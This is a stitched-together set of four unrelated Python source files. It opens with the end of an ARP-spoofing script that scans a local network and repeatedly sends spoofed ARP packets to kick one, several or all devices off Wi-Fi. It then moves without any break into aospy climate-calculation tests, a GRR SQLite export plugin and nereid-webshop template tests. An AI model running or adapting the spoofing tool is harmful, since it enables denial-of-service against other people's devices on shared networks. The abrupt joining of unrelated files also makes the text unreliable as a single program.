print("{0}\t[{5}]\t{1}{6}\t{2}{7}\t{3}{8}{4}".format(YELLOW, WHITE, RED, GREEN, END, n, host['ip'], host['mac'], host['vendor'])) # ######################################################################################## # K1CK one device def K1CKoneoff(): os.system("clear||cls") print("\n{0}K1CK-ONE-0ff{1} iz selected...{2}\n".format(RED, GREEN, END)) sys.stdout.write("\n\t{0}Scanning your N3TW0RK, H4NG 0N...{1}\n\n\r".format(RED, END)) sys.stdout.flush() hosts_list = scanNetwork() print_hosts(hosts_list) while True: try: choice = int(input("\n\t{0}CH00SE the target:-{1} ".format(WHITE, END))) - 1 # print("HOST ===", hosts_list) target_host = hosts_list[choice] target_ip = target_host['ip'] target_mac =target_host['mac'] vendor = target_host['vendor'] break except KeyboardInterrupt: return except: print("\n{0}ERROR: Please enter a number from the list!{1}".format(RED, END)) print("\n\t{0}Target:- {5}{1} - {6}{3} - {7}{4} {2}".format(RED,target_ip, END, target_mac, vendor, WHITE, RED, GREEN)) print("\n\t {0}SP00FING has started...& Press CTRL+C keys to stop it {1}\n".format(BLUE, END)) print("\n \t {1} K1CK3D {0} - 0UT 0F Wifi{2}\n".format(target_ip, RED, END)) start = time.time() try: while True: # broadcast malicious ARP packets (10p/s) R_spoof.sendPacket(defaultInterfaceMAC, defaultGatewayIP, target_ip, target_mac) elapsed = timedelta(seconds=round(time.time() - start)) print("\r \t {0}ATT4CK DUR4T10N :- {1} seconds{2}".format(YELLOW, elapsed, END), end="") time.sleep(5) except KeyboardInterrupt: return ######################################################################################### # K1CK multiple devices def K1CKsomeoff(): os.system("clear||cls") print("\n{0}K1CK-S0ME-0ff{1} iz selected...{2}\n".format(RED, GREEN, END)) sys.stdout.write("\n\t{0}Scanning your N3TW0RK, H4NG 0N...{1}\r".format(GREEN, END)) sys.stdout.flush() hosts_list = scanNetwork() print_hosts(hosts_list) while True: try: choice = input("\nChoose devices to target(comma-separated): ") if ',' in choice: some_targets = [int(i.strip()) - 1 for i in choice.split(",")] print("\nSelected devices are:\n") for i in some_targets: print(hosts_list[i]['ip']) break except KeyboardInterrupt: return except ValueError: print("\n{}Enter comma separated above devices number\n{}".format(RED, END)) print( "\n\t{0}SP00FING has started...& Press CTRL+C keys to stop it {1}\n".format(BLUE, END)) print("\n \t{0}K1CK3D them 0UT 0F Wifi{1}\n".format(RED, END)) try: start = time.time() while True: # broadcast malicious ARP packets (10p/s) for i in some_targets: target_host = hosts_list[i] target_ip = target_host['ip'] target_mac =target_host['mac'] R_spoof.sendPacket(defaultInterfaceMAC, defaultGatewayIP, target_ip, target_mac) elapsed = timedelta(seconds=round(time.time() - start)) print( "\r \t {0}ATT4CK DUR4T10N :- {1} seconds{2}".format(YELLOW, elapsed, END), end="") time.sleep(5) except KeyboardInterrupt: return # ######################################################################################## # K1CK all devices def K1CKalloff(): os.system("clear||cls") print("\n{0}K1CK-ALL-Off{1} iz selected...{2}\n".format(RED, GREEN, END)) sys.stdout.write( "\n\t{0}Scanning your N3TW0RK, H4NG 0N...{1}\n".format(GREEN, END)) sys.stdout.flush() hosts_list = scanNetwork() print_hosts(hosts_list) print("\n\t {0}SP00FING has started...& Press CTRL+C keys to stop it {1}\n".format(BLUE, END)) print("\n \t {0}K1CK3D ALL 0UT 0F Wifi{1}\n".format(RED, END)) try: # broadcast malicious ARP packets (10p/s) start = time.time() reScan = 0 while True: for i in range(len(hosts_list)): target_host = hosts_list[i] target_ip = target_host['ip'] target_mac =target_host['mac'] R_spoof.sendPacket(defaultInterfaceMAC, defaultGatewayIP, target_ip, target_mac) elapsed = timedelta(seconds=round(time.time() - start)) print( "\r\t{0}ATT4CK DUR4T10N :- {1} seconds{2}".format(YELLOW, elapsed, END), end="") reScan += 1 if reScan == 4: reScan = 0 scanNetwork() time.sleep(5) except KeyboardInterrupt: return # ######################################################################################## # script's main function def main(): ip_mac_vendor = scanNetwork() # display warning in case of no active hosts if len(ip_mac_vendor) == 0: print("\n{}WARNING: There are no other uphosts on LAN .. Try again {}\n".format(RED, END)) raise SystemExit while True: optionBanner() header = ('{0}K1CKthemout{1}> {2}'.format(BLUE, WHITE, END)) choice = input(header) if choice.upper() == 'E' or choice.upper() == 'EXIT': print('\n\n\t\t{0}ThanK Y0U for DR0PP1NG by \n\n\t\tSEE U S00N!{1}\n\n\n'.format(YELLOW, END)) raise SystemExit elif choice == '1': K1CKoneoff() os.system("clear||cls") elif choice == '2': K1CKsomeoff() os.system("clear||cls") elif choice == '3': K1CKalloff() os.system("clear||cls") else: print("\n{0}ERROR: Please select a valid option.{1}\n".format(RED, END)) if __name__ == '__main__': try: os.system("clear||cls") heading() sys.stdout.write("\n\n{}Scanning your N3TW0RK, H4NG 0N...{}\n\r".format(YELLOW, END)) net_config() main() except KeyboardInterrupt: print('\n\n\t{0}ThanK Y0U for DR0PP1NG by \n \tSEE U S00N!{1}\n\n'.format( YELLOW, END))
#!/usr/bin/env python """Basic test of the Calc module on 2D data.""" import datetime from os.path import isfile import shutil import unittest import pytest import itertools import cftime import numpy as np import xarray as xr from aospy import Var from aospy.calc import Calc, _add_metadata_as_attrs, _replace_pressure from aospy.internal_names import ETA_STR from aospy.utils.vertcoord import p_eta, dp_eta, p_level, dp_level from .data.objects.examples import ( example_proj, example_model, example_run, var_not_time_defined, condensation_rain, convection_rain, precip, sphum, globe, sahel, p, dp ) def _test_output_attrs(calc, dtype_out): with xr.open_dataset(calc.path_out[dtype_out]) as data: expected_units = calc.var.units if calc.dtype_out_vert == 'vert_int': if expected_units != '': expected_units = ("(vertical integral of {0}):" " {0} m)").format(expected_units) else: expected_units = ("(vertical integral of quantity" " with unspecified units)") expected_description = calc.var.description for name, arr in data.data_vars.items(): assert expected_units == arr.attrs['units'] assert expected_description == arr.attrs['description'] def _clean_test_direcs(): for direc in [example_proj.direc_out, example_proj.tar_direc_out]: try: shutil.rmtree(direc) except OSError: pass def _test_files_and_attrs(calc, dtype_out): assert isfile(calc.path_out[dtype_out]) assert isfile(calc.path_tar_out) _test_output_attrs(calc, dtype_out) _2D_DATE_RANGES = { 'datetime': (datetime.datetime(4, 1, 1), datetime.datetime(6, 12, 31)), 'datetime64': (np.datetime64('0004-01-01'), np.datetime64('0006-12-31')), 'cftime': (cftime.DatetimeNoLeap(4, 1, 1), cftime.DatetimeNoLeap(6, 12, 31)), 'str': ('0004', '0006') } _3D_DATE_RANGES = { 'datetime': (datetime.datetime(6, 1, 1), datetime.datetime(6, 1, 31)), 'datetime64': (np.datetime64('0006-01-01'), np.datetime64('0006-01-31')), 'cftime': (cftime.DatetimeNoLeap(6, 1, 1), cftime.DatetimeNoLeap(6, 1, 31)), 'str': ('0006', '0006') } _2D_VARS = {'basic': condensation_rain, 'composite': precip} _2D_DTYPE_OUT_VERT = {'None': None} _2D_DTYPE_IN_VERT = {'None': None} _3D_VARS = {'3D': sphum} _3D_DTYPE_OUT_VERT = {'vert_int': 'vert_int', 'vert_av': 'vert_av'} _3D_DTYPE_IN_VERT = {'sigma': 'sigma'} _CASES = ( list(itertools.product(_2D_DATE_RANGES.items(), _2D_VARS.items(), _2D_DTYPE_IN_VERT.items(), _2D_DTYPE_OUT_VERT.items())) + list(itertools.product(_3D_DATE_RANGES.items(), _3D_VARS.items(), _3D_DTYPE_IN_VERT.items(), _3D_DTYPE_OUT_VERT.items())) ) _CALC_TESTS = {} for ((date_type, date_range), (test_type, var), (vert_in_label, vert_in), (vert_out_label, vert_out)) in _CASES: _CALC_TESTS['{}-{}-{}-{}'.format( date_type, test_type, vert_in_label, vert_out_label)] = ( date_range, var, vert_in, vert_out) @pytest.fixture(params=_CALC_TESTS.values(), ids=list(_CALC_TESTS.keys())) def test_params(request): date_range, var, vert_in, vert_out = request.param yield { 'proj': example_proj, 'model': example_model, 'run': example_run, 'var': var, 'date_range': date_range, 'intvl_in': 'monthly', 'dtype_in_time': 'ts', 'dtype_in_vert': vert_in, 'dtype_out_vert': vert_out } _clean_test_direcs() def test_annual_mean(test_params): calc = Calc(intvl_out='ann', dtype_out_time='av', **test_params) calc.compute() _test_files_and_attrs(calc, 'av') def test_annual_ts(test_params): calc = Calc(intvl_out='ann', dtype_out_time='ts', **test_params) calc.compute() _test_files_and_attrs(calc, 'ts') def test_seasonal_mean(test_params): calc = Calc(intvl_out='djf', dtype_out_time='av', **test_params) calc.compute() _test_files_and_attrs(calc, 'av') def test_seasonal_ts(test_params): calc = Calc(intvl_out='djf', dtype_out_time='ts', **test_params) calc.compute() _test_files_and_attrs(calc, 'ts') def test_monthly_mean(test_params): calc = Calc(intvl_out=1, dtype_out_time='av', **test_params) calc.compute() _test_files_and_attrs(calc, 'av') def test_monthly_ts(test_params): calc = Calc(intvl_out=1, dtype_out_time='ts', **test_params) calc.compute() _test_files_and_attrs(calc, 'ts') def test_simple_reg_av(test_params): calc = Calc(intvl_out='ann', dtype_out_time='reg.av', region=[globe], **test_params) calc.compute() _test_files_and_attrs(calc, 'reg.av') def test_simple_reg_ts(test_params): calc = Calc(intvl_out='ann', dtype_out_time='reg.ts', region=[globe], **test_params) calc.compute() _test_files_and_attrs(calc, 'reg.ts') @pytest.mark.filterwarnings('ignore:Mean of empty slice') def test_complex_reg_av(test_params): calc = Calc(intvl_out='ann', dtype_out_time='reg.av', region=[sahel], **test_params) calc.compute() _test_files_and_attrs(calc, 'reg.av') test_params_not_time_defined = { 'proj': example_proj, 'model': example_model, 'run': example_run, 'var': var_not_time_defined, 'date_range': 'default', 'intvl_in': 'monthly', 'dtype_in_time': 'av', 'intvl_out': 1, } @pytest.mark.parametrize('dtype_out_time', [None, []]) def test_calc_object_no_time_options(dtype_out_time): test_params_not_time_defined['dtype_out_time'] = dtype_out_time calc = Calc(**test_params_not_time_defined) if isinstance(dtype_out_time, list): assert calc.dtype_out_time == tuple(dtype_out_time) else: assert calc.dtype_out_time == tuple([dtype_out_time]) @pytest.mark.parametrize( 'dtype_out_time', ['av', 'std', 'ts', 'reg.av', 'reg.std', 'reg.ts']) def test_calc_object_string_time_options(dtype_out_time): test_params_not_time_defined['dtype_out_time'] = dtype_out_time with pytest.raises(ValueError): Calc(**test_params_not_time_defined) def test_calc_object_time_options(): time_options = ['av', 'std', 'ts', 'reg.av', 'reg.std', 'reg.ts'] for i in range(1, len(time_options) + 1): for time_option in list(itertools.permutations(time_options, i)): if time_option != ('None',): test_params_not_time_defined['dtype_out_time'] = time_option with pytest.raises(ValueError): Calc(**test_params_not_time_defined) @pytest.mark.parametrize( ('units', 'description', 'dtype_out_vert', 'expected_units', 'expected_description'), [('', '', None, '', ''), ('m', '', None, 'm', ''), ('', 'rain', None, '', 'rain'), ('m', 'rain', None, 'm', 'rain'), ('', '', 'vert_av', '', ''), ('m', '', 'vert_av', 'm', ''), ('', 'rain', 'vert_av', '', 'rain'), ('m', 'rain', 'vert_av', 'm', 'rain'), ('', '', 'vert_int', '(vertical integral of quantity with unspecified units)', ''), ('m', '', 'vert_int', '(vertical integral of m): m kg m^-2)', ''), ('', 'rain', 'vert_int', '(vertical integral of quantity with unspecified units)', 'rain'), ('m', 'rain', 'vert_int', '(vertical integral of m): m kg m^-2)', 'rain')]) def test_attrs(units, description, dtype_out_vert, expected_units, expected_description): da = xr.DataArray(None) ds = xr.Dataset({'bar': 'foo', 'boo': 'baz'}) da = _add_metadata_as_attrs(da, units, description, dtype_out_vert) ds = _add_metadata_as_attrs(ds, units, description, dtype_out_vert) assert expected_units == da.attrs['units'] assert expected_description == da.attrs['description'] for name, arr in ds.data_vars.items(): assert expected_units == arr.attrs['units'] assert expected_description == arr.attrs['description'] @pytest.fixture() def recursive_test_params(): basic_params = { 'proj': example_proj, 'model': example_model, 'run': example_run, 'var': condensation_rain, 'date_range': (datetime.datetime(4, 1, 1), datetime.datetime(6, 12, 31)), 'intvl_in': 'monthly', 'dtype_in_time': 'ts' } recursive_params = basic_params.copy() recursive_condensation_rain = Var( name='recursive_condensation_rain', variables=(precip, convection_rain), func=lambda x, y: x - y, def_time=True) recursive_params['var'] = recursive_condensation_rain yield (basic_params, recursive_params) _clean_test_direcs() def test_recursive_calculation(recursive_test_params): basic_params, recursive_params = recursive_test_params calc = Calc(intvl_out='ann', dtype_out_time='av', **basic_params) calc = calc.compute() expected = xr.open_dataset( calc.path_out['av'])['condensation_rain'] _test_files_and_attrs(calc, 'av') calc = Calc(intvl_out='ann', dtype_out_time='av', **recursive_params) calc = calc.compute() result = xr.open_dataset( calc.path_out['av'])['recursive_condensation_rain'] _test_files_and_attrs(calc, 'av') xr.testing.assert_equal(expected, result) def test_compute_pressure(): calc = Calc( intvl_out='ann', dtype_out_time='av', var=p, proj=example_proj, model=example_model, run=example_run, date_range=('0006', '0006'), intvl_in='monthly', dtype_in_time='ts', dtype_in_vert='sigma', dtype_out_vert=None ) calc.compute() _test_files_and_attrs(calc, 'av') _clean_test_direcs() def test_compute_pressure_thicknesses(): calc = Calc( intvl_out='ann', dtype_out_time='av', var=dp, proj=example_proj, model=example_model, run=example_run, date_range=('0006', '0006'), intvl_in='monthly', dtype_in_time='ts', dtype_in_vert='sigma', dtype_out_vert=None ) calc.compute() _test_files_and_attrs(calc, 'av') _clean_test_direcs() @pytest.mark.parametrize( ['dtype_in_vert', 'expected'], [(ETA_STR, [p_eta, dp_eta, condensation_rain, 5]), ('pressure', [p_level, dp_level, condensation_rain, 5])]) def test_replace_pressure(dtype_in_vert, expected): arguments = [p, dp, condensation_rain, 5] p_in, dp_in, cond, num = arguments p_expected, dp_expected, cond_expected, num_expected = expected assert p_in.func != p_expected.func assert dp_in.func != dp_expected.func result = _replace_pressure(arguments, dtype_in_vert) p_out, dp_out, cond_out, num_out = result assert p_out.func == p_expected.func assert dp_out.func == dp_expected.func assert cond_out.func == cond_expected.func assert num_out == num_expected if __name__ == '__main__': unittest.main()
#!/usr/bin/env python """Plugin that exports results as SQLite db scripts.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals import collections import io import os import zipfile from future.builtins import str from future.utils import iteritems from future.utils import iterkeys from future.utils import itervalues import sqlite3 from grr_response_core.lib import rdfvalue from grr_response_core.lib import utils from grr_response_core.lib.rdfvalues import structs as rdf_structs from grr_response_core.lib.util import collection from grr_response_core.lib.util.compat import yaml from grr_response_server import instant_output_plugin class Rdf2SqliteAdapter(object): """An adapter for converting RDF values to a SQLite-friendly form.""" class Converter(object): def __init__(self, sqlite_type, convert_fn): self.sqlite_type = sqlite_type self.convert_fn = convert_fn BYTES_CONVERTER = Converter("BLOB", bytes) STR_CONVERTER = Converter("TEXT", str) DEFAULT_CONVERTER = STR_CONVERTER INT_CONVERTER = Converter("INTEGER", int) # Converters for fields that have a semantic type annotation in their # protobuf definition. SEMANTIC_CONVERTERS = { rdfvalue.RDFString: STR_CONVERTER, rdfvalue.RDFBytes: BYTES_CONVERTER, rdfvalue.RDFInteger: INT_CONVERTER, bool: INT_CONVERTER, # Sqlite does not have a bool type. rdfvalue.RDFDatetime: Converter("INTEGER", lambda x: x.AsMicrosecondsSinceEpoch()), rdfvalue.RDFDatetimeSeconds: Converter("INTEGER", lambda x: x.AsSecondsSinceEpoch() * 1000000), rdfvalue.DurationSeconds: Converter("INTEGER", lambda x: x.microseconds), } # Converters for fields that do not have a semantic type annotation in their # protobuf definition. NON_SEMANTIC_CONVERTERS = { rdf_structs.ProtoBinary: BYTES_CONVERTER, rdf_structs.ProtoString: STR_CONVERTER, rdf_structs.ProtoEnum: STR_CONVERTER, rdf_structs.ProtoUnsignedInteger: INT_CONVERTER, rdf_structs.ProtoSignedInteger: INT_CONVERTER, rdf_structs.ProtoFixed32: INT_CONVERTER, rdf_structs.ProtoFixed64: INT_CONVERTER, rdf_structs.ProtoFloat: Converter("REAL", float), rdf_structs.ProtoDouble: Converter("REAL", float), rdf_structs.ProtoBoolean: INT_CONVERTER, } @staticmethod def GetConverter(type_info): if type_info.__class__ is rdf_structs.ProtoRDFValue: return Rdf2SqliteAdapter.SEMANTIC_CONVERTERS.get( type_info.type, Rdf2SqliteAdapter.DEFAULT_CONVERTER) else: return Rdf2SqliteAdapter.NON_SEMANTIC_CONVERTERS.get( type_info.__class__, Rdf2SqliteAdapter.DEFAULT_CONVERTER) class SqliteInstantOutputPlugin( instant_output_plugin.InstantOutputPluginWithExportConversion): """Instant output plugin that converts results into SQLite db commands.""" plugin_name = "sqlite-zip" friendly_name = "SQLite scripts (zipped)" description = "Output ZIP archive containing SQLite scripts." output_file_extension = ".zip" ROW_BATCH = 100 def __init__(self, *args, **kwargs): super(SqliteInstantOutputPlugin, self).__init__(*args, **kwargs) self.archive_generator = None # Created in Start() self.export_counts = {} @property def path_prefix(self): prefix, _ = os.path.splitext(self.output_file_name) return prefix def Start(self): self.archive_generator = utils.StreamingZipGenerator( compression=zipfile.ZIP_DEFLATED) self.export_counts = {} return [] def ProcessSingleTypeExportedValues(self, original_value_type, exported_values): first_value = next(exported_values, None) if not first_value: return if not isinstance(first_value, rdf_structs.RDFProtoStruct): raise ValueError("The SQLite plugin only supports export-protos") yield self.archive_generator.WriteFileHeader( "%s/%s_from_%s.sql" % (self.path_prefix, first_value.__class__.__name__, original_value_type.__name__)) table_name = "%s.from_%s" % (first_value.__class__.__name__, original_value_type.__name__) schema = self._GetSqliteSchema(first_value.__class__) # We will buffer the sql statements into an in-memory sql database before # dumping them to the zip archive. We rely on the PySQLite library for # string escaping. db_connection = sqlite3.connect(":memory:") db_cursor = db_connection.cursor() yield self.archive_generator.WriteFileChunk( "BEGIN TRANSACTION;\n".encode("utf-8")) with db_connection: buf = io.StringIO() buf.write(u"CREATE TABLE \"%s\" (\n " % table_name) column_types = [(k, v.sqlite_type) for k, v in iteritems(schema)] buf.write(u",\n ".join([u"\"%s\" %s" % (k, v) for k, v in column_types])) buf.write(u"\n);") db_cursor.execute(buf.getvalue()) chunk = (buf.getvalue() + "\n").encode("utf-8") yield self.archive_generator.WriteFileChunk(chunk) self._InsertValueIntoDb(table_name, schema, first_value, db_cursor) for sql in self._FlushAllRows(db_connection, table_name): yield sql counter = 1 for batch in collection.Batch(exported_values, self.ROW_BATCH): counter += len(batch) with db_connection: for value in batch: self._InsertValueIntoDb(table_name, schema, value, db_cursor) for sql in self._FlushAllRows(db_connection, table_name): yield sql db_connection.close() yield self.archive_generator.WriteFileChunk("COMMIT;\n".encode("utf-8")) yield self.archive_generator.WriteFileFooter() counts_for_original_type = self.export_counts.setdefault( original_value_type.__name__, dict()) counts_for_original_type[first_value.__class__.__name__] = counter def _GetSqliteSchema(self, proto_struct_class, prefix=""): """Returns a mapping of SQLite column names to Converter objects.""" schema = collections.OrderedDict() for type_info in proto_struct_class.type_infos: if type_info.__class__ is rdf_structs.ProtoEmbedded: schema.update( self._GetSqliteSchema( type_info.type, prefix="%s%s." % (prefix, type_info.name))) else: field_name = prefix + type_info.name schema[field_name] = Rdf2SqliteAdapter.GetConverter(type_info) return schema def _InsertValueIntoDb(self, table_name, schema, value, db_cursor): sql_dict = self._ConvertToCanonicalSqlDict(schema, value.ToPrimitiveDict()) buf = io.StringIO() buf.write(u"INSERT INTO \"%s\" (\n " % table_name) buf.write(u",\n ".join(["\"%s\"" % k for k in iterkeys(sql_dict)])) buf.write(u"\n)") buf.write(u"VALUES (%s);" % u",".join([u"?"] * len(sql_dict))) db_cursor.execute(buf.getvalue(), list(itervalues(sql_dict))) def _ConvertToCanonicalSqlDict(self, schema, raw_dict, prefix=""): """Converts a dict of RDF values into a SQL-ready form.""" flattened_dict = {} for k, v in iteritems(raw_dict): if isinstance(v, dict): flattened_dict.update( self._ConvertToCanonicalSqlDict( schema, v, prefix="%s%s." % (prefix, k))) else: field_name = prefix + k flattened_dict[field_name] = schema[field_name].convert_fn(v) return flattened_dict def _FlushAllRows(self, db_connection, table_name): """Copies rows from the given db into the output file then deletes them.""" for sql in db_connection.iterdump(): if (sql.startswith("CREATE TABLE") or sql.startswith("BEGIN TRANSACTION") or sql.startswith("COMMIT")): # These statements only need to be written once. continue # The archive generator expects strings (not Unicode objects returned by # the pysqlite library). yield self.archive_generator.WriteFileChunk((sql + "\n").encode("utf-8")) with db_connection: db_connection.cursor().execute("DELETE FROM \"%s\";" % table_name) def Finish(self): manifest = {"export_stats": self.export_counts} manifest_bytes = yaml.Dump(manifest).encode("utf-8") header = self.path_prefix + "/MANIFEST" yield self.archive_generator.WriteFileHeader(header) yield self.archive_generator.WriteFileChunk(manifest_bytes) yield self.archive_generator.WriteFileFooter() yield self.archive_generator.Close()
import unittest import datetime import trytond from trytond.tests.test_tryton import USER, DB_NAME, CONTEXT, POOL from trytond.transaction import Transaction from test_base import BaseTestCase from trytond.config import config from decimal import Decimal from nereid import request config.set('email', 'from', 'from@xyz.com') class TestTemplates(BaseTestCase): """ Test case for templates in nereid-webshop. """ def setUp(self): """ setUp method """ trytond.tests.test_tryton.install_module('nereid_catalog_variants') super(TestTemplates, self).setUp() def cart(self, to_login): """ Checking cart functionality with and without login. Used by test_cart. """ qty = 7 with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() self.create_test_products() template1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product1 = template1.products[0] with app.test_client() as c: if to_login: self.login(c, "email@example.com", "password") rv = c.get('/cart') self.assertEqual(rv.status_code, 200) sales = self.Sale.search([]) self.assertEqual(len(sales), 0) c.post( '/cart/add', data={ 'product': product1.id, 'quantity': qty } ) rv = c.get('/cart') self.assertEqual(rv.status_code, 200) sales = self.Sale.search([]) self.assertEqual(len(sales), 1) sale = sales[0] self.assertEqual(len(sale.lines), 1) self.assertEqual( sale.lines[0].product, product1.products[0] ) self.assertEqual(sale.lines[0].quantity, qty) def test_0010_home_template(self): """ Test for home template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/') self.assertEqual(rv.status_code, 200) self.assertEqual(request.path, '/') def test_0015_login(self): """ Test for login template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/login') self.assertEqual(rv.status_code, 200) rv2 = self.login(c, 'email@example.com', 'password') self.assertIn('Redirecting', rv2.data) self.assertTrue(rv2.location.endswith('localhost/')) with self.assertRaises(AssertionError): self.login(c, 'email@example.com', 'wrong') def test_0020_registration(self): """ Test for registration template. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/registration') self.assertEqual(rv.status_code, 200) data = { 'name': 'Registered User', 'email': 'regd_user@openlabs.co.in', 'password': 'password' } response = c.post('/registration', data=data) self.assertEqual(response.status_code, 200) data['confirm'] = 'password' response = c.post('/registration', data=data) self.assertEqual(response.status_code, 302) def test_0025_nodes(self): """ Tests for nodes/subnodes. Tests node properties. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() uom, = self.Uom.search([], limit=1) values1 = { 'name': 'Product-1', 'category': self.category.id, 'type': 'goods', 'default_uom': uom.id, 'products': [ ('create', [{ 'uri': 'product-1', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }]) ] } values2 = { 'name': 'Product-2', 'category': self.category.id, 'default_uom': uom.id, 'products': [ ('create', [{ 'uri': 'product-2', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }, { 'uri': 'product-21', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }]) ] } values3 = { 'name': 'Product-3', 'category': self.category.id, 'default_uom': uom.id, 'products': [ ('create', [{ 'uri': 'product-3', 'displayed_on_eshop': True, 'list_price': Decimal('10'), 'cost_price': Decimal('5'), }]) ] } template1, template2, template3, = self.ProductTemplate.create([ values1, values2, values3 ]) node1, = self.Node.create([{ 'name': 'Node1', 'type_': 'catalog', 'slug': 'node1', }]) self.assert_(node1) node2, = self.Node.create([{ 'name': 'Node2', 'type_': 'catalog', 'slug': 'node2', 'display': 'product.template', }]) node3, = self.Node.create([{ 'name': 'Node3', 'type_': 'catalog', 'slug': 'node3', }]) self.Node.write([node2], { 'parent': node1 }) self.Node.write([node3], { 'parent': node2 }) # Create Product-Node relationships. self.ProductNodeRelationship.create([{ 'product': pro, 'node': node1, } for pro in template1.products]) self.ProductNodeRelationship.create([{ 'product': pro, 'node': node2, } for pro in template2.products]) self.ProductNodeRelationship.create([{ 'product': pro, 'node': node3, } for pro in template3.products]) app = self.get_app() for node in [node1, node2, node3]: self.assert_(node) self.assertEqual(node2.parent, node1) with app.test_client() as c: url = 'nodes/{0}/{1}/{2}'.format( node1.id, node1.slug, 1 ) rv = c.get('/nodes/{0}/{1}'.format(node1.id, node1.slug)) self.assertEqual(rv.status_code, 200) url = 'nodes/{0}/{1}/{2}'.format( node2.id, node2.slug, 1 ) rv = c.get(url) self.assertEqual(rv.status_code, 200) def test_0030_articles(self): """ Tests the rendering of an article. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() article, = self.Article.search([ ('uri', '=', 'test-article') ]) categ, = self.ArticleCategory.search([ ('title', '=', 'Test Categ') ]) self.assertEqual(len(categ.published_articles), 0) self.Article.publish([article]) self.assertEqual(len(categ.published_articles), 1) with app.test_client() as c: response = c.get('/article/test-article') self.assertEqual(response.status_code, 200) self.assertIn('Test Content', response.data) self.assertIn('Test Article', response.data) def test_0035_cart(self): """ Test the cart. """ for to_login in [True, False]: print("Login?: {0}".format(to_login)) self.cart(to_login) def test_0040_addresses(self): """ Test addresses. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: rv = c.get('/view-address') self.assertEqual(rv.status_code, 302) self.login(c, 'email@example.com', 'password') rv = c.get('/view-address') self.assertEqual(rv.status_code, 200) # Creating an address rv = c.get('/create-address') self.assertEqual(rv.status_code, 200) data = { 'name': 'Some Dude', 'street': 'Test Street', 'zip': 'zip', 'city': 'city', 'email': 'email@example.com', 'phone': '123456789', 'country': self.available_countries[0].id, 'subdivision': self.Country( self.available_countries[0] ).subdivisions[0].id } # Check if zero addresses before posting. self.assertEqual( len(self.registered_user.party.addresses), 0 ) response = c.post( '/create-address', data=data ) self.assertEqual(response.status_code, 302) # Check that our address info is present in template data. address, = self.registered_user.party.addresses rv = c.get('/view-address') self.assertIn(data['name'], rv.data) self.assertIn(data['street'], rv.data) self.assertIn(data['city'], rv.data) self.assertEqual(rv.status_code, 200) self.assertEqual( len(self.registered_user.party.addresses), 1 ) # Now edit some bits of the address and view it again. rv = c.get('/edit-address/{0}'.format(address.id)) self.assertEqual(rv.status_code, 200) response = c.post( '/edit-address/{0}'.format(address.id), data={ 'name': 'Some Other Dude', 'street': 'Street', 'streetbis': 'StreetBis', 'zip': 'zip', 'city': 'City', 'email': 'email@example.com', 'phone': '1234567890', 'country': self.available_countries[0].id, 'subdivision': self.Country( self.available_countries[0]).subdivisions[0].id, } ) self.assertEqual(response.status_code, 302) rv = c.get('/view-address') self.assertIn('Some Other Dude', rv.data) with self.assertRaises(AssertionError): self.assertIn(data['name'], rv.data) # Now remove the address. rv = c.post( '/remove-address/{0}' .format(address.id) ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.party.addresses), 0 ) def test_0045_wishlist(self): """ Tests the wishlist. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() self.create_test_products() app = self.get_app() with app.test_client() as c: # Guests will be redirected. rv = c.post( '/wishlists', data={ 'name': 'Testlist' } ) self.assertEquals(rv.status_code, 302) self.login(c, 'email@example.com', 'password') # No wishlists currently. self.assertEqual( len(self.registered_user.wishlists), 0 ) rv = c.post( '/wishlists', data={ 'name': 'Testlist' } ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.wishlists), 1 ) rv = c.get('/wishlists') self.assertIn('Testlist', rv.data) # Remove this wishlist. rv = c.delete( '/wishlists/{0}'.format( self.registered_user.wishlists[0].id ) ) self.assertEqual(rv.status_code, 200) # Now add products. product1, = self.ProductTemplate.search([ ('name', '=', 'product 1') ]) product2, = self.ProductTemplate.search([ ('name', '=', 'product 2') ]) # Adding a product without creating a wishlist # creates a wishlist automatically. rv = c.post( 'wishlists/products', data={ 'product': product1.products[0].id, 'action': 'add' } ) self.assertEqual(rv.status_code, 302) self.assertEqual(len(self.registered_user.wishlists), 1) self.assertEqual( len(self.registered_user.wishlists[0].products), 1 ) rv = c.get( '/wishlists/{0}' .format(self.registered_user.wishlists[0].id) ) self.assertIn(product1.name, rv.data) # Add another product. rv = c.post( 'wishlists/products', data={ 'product': product2.products[0].id, 'action': 'add', 'wishlist': self.registered_user.wishlists[0].id } ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.wishlists[0].products), 2 ) rv = c.get( '/wishlists/{0}' .format(self.registered_user.wishlists[0].id) ) self.assertIn(product2.name, rv.data) # Remove a product rv = c.post( 'wishlists/products', data={ 'product': product2.products[0].id, 'wishlist': self.registered_user.wishlists[0].id, 'action': 'remove' } ) self.assertEqual(rv.status_code, 302) self.assertEqual( len(self.registered_user.wishlists[0].products), 1 ) rv = c.get( '/wishlists/{0}' .format(self.registered_user.wishlists[0].id) ) self.assertNotIn(product2.name, rv.data) @unittest.skip("Not implemented yet.") def test_0050_profile(self): """ Test the profile. """ with Transaction().start(DB_NAME, USER, context=CONTEXT): self.setup_defaults() app = self.get_app() with app.test_client() as c: # Without login. rv = c.get('/me') self.assertEqual(rv.status_code, 302) self.login(c, 'email@example.com', 'password') rv = c.post( '/me', data={ 'display_name': 'Pritish C', 'timezone': 'Asia/Kolkata' } ) self.assertEqual(rv.status_code, 302) rv = c.get('/me') self.assertIn('Pritish C', rv.data) 